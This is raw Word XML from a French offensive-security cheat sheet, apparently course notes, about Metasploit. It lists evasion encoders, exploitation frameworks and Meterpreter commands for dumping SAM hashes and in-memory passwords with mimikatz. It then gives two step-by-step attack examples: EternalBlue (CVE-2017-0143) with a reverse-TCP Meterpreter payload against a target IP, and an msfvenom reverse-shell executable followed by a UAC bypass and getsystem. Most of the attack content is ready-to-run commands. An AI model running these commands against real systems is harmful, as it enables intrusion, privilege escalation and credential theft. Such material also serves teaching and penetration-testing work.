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9F4EA" w14:textId="77777777" w:rsidR="00EE5E88" w:rsidRPr="00EE5E88" w:rsidRDefault="00EE5E88" w:rsidP="00EE5E88">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE5E88">
        <w:t>Metasploit : une version gratuite (inclus dans Kali) et une version payante (génération de charges difficilement détectables).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51057239" w14:textId="77777777" w:rsidR="00EE5E88" w:rsidRPr="008C6FA5" w:rsidRDefault="00EE5E88" w:rsidP="00EE5E88">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C6FA5">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Terminologie :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FBDDE8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r w:rsidRPr="008C6FA5">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Exploit : vulnérabilité</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517CE805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Payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008C6FA5">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> : charge malveillante utilisant l’exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDDE062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Encoders</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008C6FA5">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> : outil permettant de masquer la charge pour la rendre moins détectable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF5DDE7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Evasion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008C6FA5">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> : bypass de Windows Defender et autres applications de sécurité</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4EB9A4" w14:textId="77777777" w:rsidR="00EE5E88" w:rsidRPr="008C6FA5" w:rsidRDefault="00EE5E88" w:rsidP="00EE5E88">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C6FA5">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Outils complémentaires :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13349070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Unicorn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008C6FA5">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> : utilise Metasploit, mais ajoute d’autres encodeurs pour plus de discrétion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6295D394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PowerSploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008C6FA5">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> : outil spécifique contre Windows, utilise PowerShell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E2CC21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TheEmpire</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008C6FA5">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> : attaque de MS Office (macros), </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008C6FA5">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>framework</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008C6FA5">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> de post-exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBDCF07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TheFatRat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008C6FA5">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> : attaque d’Android (récupération d’APK pour y intégrer une charge)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBC0C7E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r w:rsidRPr="008C6FA5">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">TIDOS : </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008C6FA5">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>framework</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008C6FA5">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> d’exploitation plus simple que Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C382C84" w14:textId="77777777" w:rsidR="00EE5E88" w:rsidRPr="008C6FA5" w:rsidRDefault="00EE5E88" w:rsidP="00EE5E88">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008C6FA5">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GoPhish</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008C6FA5">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008C6FA5">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>framework</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008C6FA5">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> de phishing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1210AFA1" w14:textId="77777777" w:rsidR="00EE5E88" w:rsidRPr="008C6FA5" w:rsidRDefault="00EE5E88" w:rsidP="00EE5E88">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C6FA5">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Commandes Metasploit utiles :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252E67B7" w14:textId="77777777" w:rsidR="00EE5E88" w:rsidRPr="00EE5E88" w:rsidRDefault="00EE5E88" w:rsidP="00EE5E88">
      <w:pPr>
        <w:pStyle w:val="Consoleinline"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE5E88">
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE5E88">
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE5E88">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00EE5E88">
        <w:tab/>
        <w:t># Lancer Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004DA21D" w14:textId="77777777" w:rsidR="00EE5E88" w:rsidRPr="00EE5E88" w:rsidRDefault="00EE5E88" w:rsidP="00EE5E88">
      <w:pPr>
        <w:pStyle w:val="Consoleinline"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE5E88">
        <w:t># use</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE5E88">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00EE5E88">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00EE5E88">
        <w:tab/>
        <w:t># Appelle un module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D50E2B7" w14:textId="77777777" w:rsidR="00EE5E88" w:rsidRPr="00EE5E88" w:rsidRDefault="00EE5E88" w:rsidP="00EE5E88">
      <w:pPr>
        <w:pStyle w:val="Consoleinline"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE5E88">
        <w:t># set</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE5E88">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00EE5E88">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00EE5E88">
        <w:tab/>
        <w:t># Assigne un objet à un module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63165874" w14:textId="77777777" w:rsidR="00EE5E88" w:rsidRPr="00EE5E88" w:rsidRDefault="00EE5E88" w:rsidP="00EE5E88">
      <w:pPr>
        <w:pStyle w:val="Consoleinline"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE5E88">
        <w:t># show</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE5E88">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00EE5E88">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00EE5E88">
        <w:tab/>
        <w:t># Affiche des informations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4C376D" w14:textId="77777777" w:rsidR="00EE5E88" w:rsidRPr="00EE5E88" w:rsidRDefault="00EE5E88" w:rsidP="00EE5E88">
      <w:pPr>
        <w:pStyle w:val="Consoleinline"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE5E88">
        <w:t># exploit</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE5E88">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00EE5E88">
        <w:tab/>
        <w:t># Lancer l’exploit/le module configuré</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F72FE8" w14:textId="77777777" w:rsidR="00EE5E88" w:rsidRPr="00EE5E88" w:rsidRDefault="00EE5E88" w:rsidP="00EE5E88">
      <w:pPr>
        <w:pStyle w:val="Consoleinline"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE5E88">
        <w:t># back</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE5E88">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00EE5E88">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00EE5E88">
        <w:tab/>
        <w:t># Revenir en arrière</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F5B2EB" w14:textId="6A0BD0F2" w:rsidR="00EE5E88" w:rsidRPr="00EE5E88" w:rsidRDefault="00EE5E88" w:rsidP="00EE5E88">
      <w:pPr>
        <w:pStyle w:val="Consoleinline"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE5E88">
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE5E88">
        <w:t>search</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE5E88">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00EE5E88">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="005B7BA6">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00EE5E88">
        <w:t># Recherche des modules à partir de mots-clés</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADDC0D5" w14:textId="77777777" w:rsidR="00EE5E88" w:rsidRPr="00EE5E88" w:rsidRDefault="00EE5E88" w:rsidP="00EE5E88">
      <w:pPr>
        <w:pStyle w:val="Consoleinline"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE5E88">
        <w:t># check</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE5E88">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00EE5E88">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00EE5E88">
        <w:tab/>
        <w:t># Vérifie la configuration d’un module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183B6E98" w14:textId="77777777" w:rsidR="00C6380C" w:rsidRPr="00EE5E88" w:rsidRDefault="00EE5E88" w:rsidP="00EE5E88">
      <w:pPr>
        <w:pStyle w:val="Consolelastline"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE5E88">
        <w:t># sessions</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE5E88">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00EE5E88">
        <w:tab/>
        <w:t># Interagit avec les sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0E6E13" w14:textId="77777777" w:rsidR="00EE5E88" w:rsidRPr="00EE5E88" w:rsidRDefault="00EE5E88" w:rsidP="00EE5E88">
      <w:r w:rsidRPr="00EE5E88">
        <w:t>Commandes Meterpreter utiles :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A192DD" w14:textId="77777777" w:rsidR="00EE5E88" w:rsidRPr="00EE5E88" w:rsidRDefault="00EE5E88" w:rsidP="00EE5E88">
      <w:pPr>
        <w:pStyle w:val="Consoleinline"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE5E88">
        <w:t>&gt; background</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE5E88">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00EE5E88">
        <w:tab/>
        <w:t xml:space="preserve"># Retour </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE5E88">
        <w:t>shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE5E88">
        <w:t xml:space="preserve"> d’attaque sans quitter la session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588BF875" w14:textId="77777777" w:rsidR="00EE5E88" w:rsidRPr="00EE5E88" w:rsidRDefault="00EE5E88" w:rsidP="00EE5E88">
      <w:pPr>
        <w:pStyle w:val="Consoleinline"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE5E88">
        <w:t>&gt; autoroute</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE5E88">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00EE5E88">
        <w:tab/>
        <w:t xml:space="preserve"># Routage </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE5E88">
        <w:t>inter-sessions</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0CC787FC" w14:textId="77777777" w:rsidR="00EE5E88" w:rsidRPr="00EE5E88" w:rsidRDefault="00EE5E88" w:rsidP="00EE5E88">
      <w:pPr>
        <w:pStyle w:val="Consoleinline"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE5E88">
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE5E88">
        <w:t>migrate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE5E88">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00EE5E88">
        <w:tab/>
        <w:t xml:space="preserve"># Migrer la charge entre les </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE5E88">
        <w:t>procesus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE5E88">
        <w:t xml:space="preserve"> de la machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB87C1A" w14:textId="77777777" w:rsidR="00EE5E88" w:rsidRPr="00EE5E88" w:rsidRDefault="00EE5E88" w:rsidP="00EE5E88">
      <w:pPr>
        <w:pStyle w:val="Consoleinline"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE5E88">
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE5E88">
        <w:t>hashdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE5E88">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00EE5E88">
        <w:tab/>
        <w:t># Récupération de la base SAM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097DDC12" w14:textId="625BD3AA" w:rsidR="00EE5E88" w:rsidRPr="00EE5E88" w:rsidRDefault="00EE5E88" w:rsidP="00EE5E88">
      <w:pPr>
        <w:pStyle w:val="Consoleinline"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE5E88">
        <w:t>&gt; kiwi/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE5E88">
        <w:t>mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE5E88">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="005B7BA6">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00EE5E88">
        <w:t># Récupération des mots de passe en mémoire</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C706439" w14:textId="77777777" w:rsidR="00EE5E88" w:rsidRPr="00EE5E88" w:rsidRDefault="00EE5E88" w:rsidP="00EE5E88">
      <w:pPr>
        <w:pStyle w:val="Consoleinline"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE5E88">
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE5E88">
        <w:t>upload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE5E88">
        <w:t>/download</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE5E88">
        <w:tab/>
        <w:t># Téléchargement ou envoi de fichiers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC1B5B3" w14:textId="77777777" w:rsidR="00EE5E88" w:rsidRPr="00EE5E88" w:rsidRDefault="00EE5E88" w:rsidP="00EE5E88">
      <w:pPr>
        <w:pStyle w:val="Consoleinline"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE5E88">
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE5E88">
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE5E88">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00EE5E88">
        <w:tab/>
        <w:t># Lance une commande PowerShell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28646973" w14:textId="77D41558" w:rsidR="00EE5E88" w:rsidRDefault="00EE5E88" w:rsidP="00EE5E88">
      <w:pPr>
        <w:pStyle w:val="Consolelastline"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE5E88">
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE5E88">
        <w:t>getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE5E88">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE5E88">
        <w:t>getpid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE5E88">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="005B7BA6">
        <w:tab/>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="00EE5E88">
        <w:t># Affiche l’identité de l’utilisateur</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2E16F4" w14:textId="77777777" w:rsidR="00EE5E88" w:rsidRPr="00EE5E88" w:rsidRDefault="00EE5E88" w:rsidP="00EE5E88">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Exemple 1 – </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE5E88">
        <w:t>Utilisation de l’exploit Wannacry (CVE-2017-0143)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16334EA2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 xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE5E88">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="495C54F9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search CVE-2017-0143</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7634B02B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use exploit/windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE5E88">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE5E88">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/ms17_010_eternalblue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E57480C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info exploit/windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE5E88">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE5E88">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/ms17_010_eternalblue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5573D9E3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set RHOSTS 192.168.1.109</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587AB806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search payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F2A0DB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set PAYLOAD windows/x64/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE5E88">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE5E88">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE5E88">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5511FA3A" w14:textId="77777777" w:rsidR="00EE5E88" w:rsidRPr="00EE5E88" w:rsidRDefault="00EE5E88" w:rsidP="00EE5E88">
      <w:pPr>
        <w:pStyle w:val="Consoleinline"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE5E88">
        <w:t># check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB968E6" w14:textId="77777777" w:rsidR="00EE5E88" w:rsidRDefault="00EE5E88" w:rsidP="00EE5E88">
      <w:pPr>
        <w:pStyle w:val="Consolelastline"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE5E88">
        <w:t># exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFA13A0" w14:textId="77777777" w:rsidR="00EE5E88" w:rsidRDefault="00EE5E88" w:rsidP="00EE5E88">
      <w:r>
        <w:t>Exemple 2 – Obtention de privilèges sur une machine sans antivirus avec UAC par défaut</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CFB352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EE5E88">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE5E88">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> --payload windows/x64/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE5E88">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE5E88">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE5E88">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE5E88">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> --platform Windows --arch x64 --format exe --out payload-6_1.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1F3499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EE5E88">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="173182F6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use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6179E5BE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set payload windows/x64/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE5E88">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE5E88">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE5E88">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1C6F83B7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 xml:space="preserve"># set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE5E88">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE5E88">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.1.111</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1CC736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 xml:space="preserve"># set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE5E88">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE5E88">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54136A9C" w14:textId="77777777" w:rsidR="00EE5E88" w:rsidRP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# run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EDD697" w14:textId="77777777" w:rsidR="00EE5E88" w:rsidRDefault="00EE5E88" w:rsidP="00EE5E88">
      <w:pPr>
        <w:pStyle w:val="Consoleinline"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE5E88">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-- Execute payload on remote host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4E1242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EE5E88">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301F38AE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use exploit/windows/local/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE5E88">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bypassuac</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="38CE48B9" w14:textId="77777777" w:rsid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># sessions -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5CC8AF0E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set session 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F0A1BA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exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7916CA" w14:textId="77777777" w:rsidR="00EE5E88" w:rsidRPr="00EE5E88" w:rsidRDefault="00EE5E88" w:rsidP="00EE5E88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EE5E88">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>getsystem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="236C2265" w14:textId="77777777" w:rsidR="00EE5E88" w:rsidRDefault="00EE5E88" w:rsidP="00EE5E88">
      <w:pPr>
        <w:pStyle w:val="Consolelast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EE5E88">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
